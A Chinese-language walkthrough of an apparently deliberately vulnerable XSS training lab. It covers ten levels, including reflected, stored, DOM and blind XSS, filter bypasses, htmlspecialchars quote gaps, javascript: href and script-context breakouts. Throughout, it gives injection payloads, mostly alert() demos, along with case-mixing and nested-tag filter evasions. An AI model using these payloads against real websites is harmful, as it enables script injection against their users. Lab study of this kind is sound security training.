<div id="xssd_main">
<script>
function domxss(){
var str = document.getElementById("text").value;
document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
}
//试试:'><img src="#" onmouseover="alert('xss')">
//试试:' onclick="alert('xss')">,闭合掉就行
</script>
<!--<a href="" onclick=('xss')>-->
<input id="text" name="text" type="text" value="" />
<input id="button" type="button" value="click me!" onclick="domxss()" />
<div id="dom"></div>
</div>
文章目录
Less-1反射型xss(get)
我们先输入一些特殊字符,看是否有过滤掉我们输入的特殊字符,点击提交如图所示
' '' <>6666
此时发现并没有过滤掉特殊字符,可能存在xss漏洞,我们查看页面源码,右键点击空白处即可。
然后按Ctrl+F输入6666即可找到对应输出的语句。
然后我们输入
<script>alert('xss')</script>
此时发现输入文本框长度不够,我们可以进行修改前端代码尝试。按F12打开开发者工具,然后将20改为更大的数。然后输入点击提交即可
Less-2反射性xss(post)
由暴力破解即可知道账号密码,登录然后跟less-1一样输入即可,GET和POST的区别是GET是以url方式提交数据而POST是以表单方式在请求体里面提交即在上一个实验中,可以通过URL来改变参数利用xss漏洞,而在这个实验中不可以。
Less-3存储型xss
首先我们尝试输入一些特殊字符
" ' <> 666&
可以发现并没有过滤,然后我们跟前面步骤一样,输入代码提交后即可
<script>alert('xss')</script>
与前两个实验不同的是,这个为存储型XSS之前为一次性的反射型XSS,这个写进了数据库与之前相比,这个会造成一个持久性伤害每次打开页面弹窗都会出现。
Less-4DOM型xss
我们先输入111查看
发现出来what do you see,点击发现页面404,我们查看源码,找到what do you see
点击提交按钮时会触发onclick事件,执行domxss()函数,通过document.getElementById()函数获取输入框内内容显示到页面
只要将 < a href="’ "> < /a >标签造成闭合即可通关,我们输入
#' onclick="alert(111)">
点击提交即可
Less-5DOM型xss
我们先输入1111,点击提交
我们查看页面源代码
<div id="xssd_main">
<script>
function domxss(){
var str = window.location.search;
var txss = decodeURIComponent(str.split("text=")[1]);
var xss = txss.replace(/\+/g,' ');
// alert(xss);
document.getElementById("dom").innerHTML = "<a href='"+xss+"'>就让往事都随风,都随风吧</a>";
}
//试试:'><img src="#" οnmοuseοver="alert('xss')">
//试试:' οnclick="alert('xss')">,闭合掉就行
</script>
<!--<a href="" onclick=('xss')>-->
<form method="get">
<input id="text" name="text" type="text" value="" />
<input id="submit" type="submit" value="请说出你的伤心往事"/>
</form>
<div id="dom"></div>
</div>
<a href='#' onclick='domxss()'>有些费尽心机想要忘记的事情,后来真的就忘掉了</a>
我们通过读代码可以发现,这个也是从url读取我们的输入的内容,跟反射型一样,它的输出也是在a标签里面,我们输入
#' onclick="alert(111)">
然后点击就让往事随风吧即可弹窗
Less-6xss盲打
两个空随便输入111,点击提交,可以看到
看起来我们输入的内容像是被提交给了后台, 我们尝试输入语句
<script>alert('xss')</script>
点击提交,然后登录后台,管理员界面。
点击提示可查看登陆界面
登陆后即可发现弹框
Less-7xss过滤
补充知识:
xss绕过-过滤
1.前端限制绕过,直接抓包重放,或者修改html前端代码
2.大小写,比如:
<SCRIPT>aLeRT(111)</sCRIpt>
3.拼凑:
<scri<script>pt>alert(111)</scri</script> pt>
4.使用注释进行干扰:
<scri<!--test-->pt>alert(111)</sc <!--test--> ript>
xss-绕过-编码
后台过滤了特殊字符,比如script标签,但该标签可以被各种编码,后台不一定会过滤,当浏览器对该编码进行识别时,会翻译成正常的标签,从而执行.
例如:
我们开始通关,首先输入
<script>;' "123
点击提交进行尝试,
查看页面源代码,发现script标签被过滤掉了
接下来我们尝试大小写混合的方式来进行注入,成功弹窗。
<ScRipT>alert('xss')</ScRipT>
同样,我们还可以使用img标签,输入
<img src=x onerror="alert(111)"/>
也可以弹框
Less-8xss之htmlspecialchars
首先,大家要了解htmlspecialchars()函数是php常用方法,是把预定义的字符转换为HTML实体。预定义的字符是:
&(和号)成为&
”(双引号)成为"
′(单引号)成为'
<(小于)成为<
>(大于)成为>
可用的引号类型:
ENT_COMPAT -默认。仅编码双引号。
ENT_QUOTES-编码双引号和单引号。
ENT_NOQUOTES-不编码任何引号。
我们先输入
111' " <>&
查看页面源代码,发现单引号没有被过滤
我们输入
1' onclick='alert(111)'
点击提交,再点击文本框下方的输入语句,即可弹框
Less-9xss之href输出
输出在a标签的herf属性里面,可以使用javascript协议来执行js
防御的时候只允许http或者https,其次在处理htmlspecialchars()函数。
我们打开本地这一关卡的php文件查看源码
我们可以发现它把字符包括单引号双引号,左右尖括号都过滤了
我们尝试输入
javascript:alert(111)
然后点击提交,点击下面的篮字即可弹窗
Less-10xss之js输出
首先,我们输入1111,查看页面源代码
然后我们可以构造
对应颜色的做闭合
所以我们输入
x'</script><script>alert('xss')</script>
即可弹窗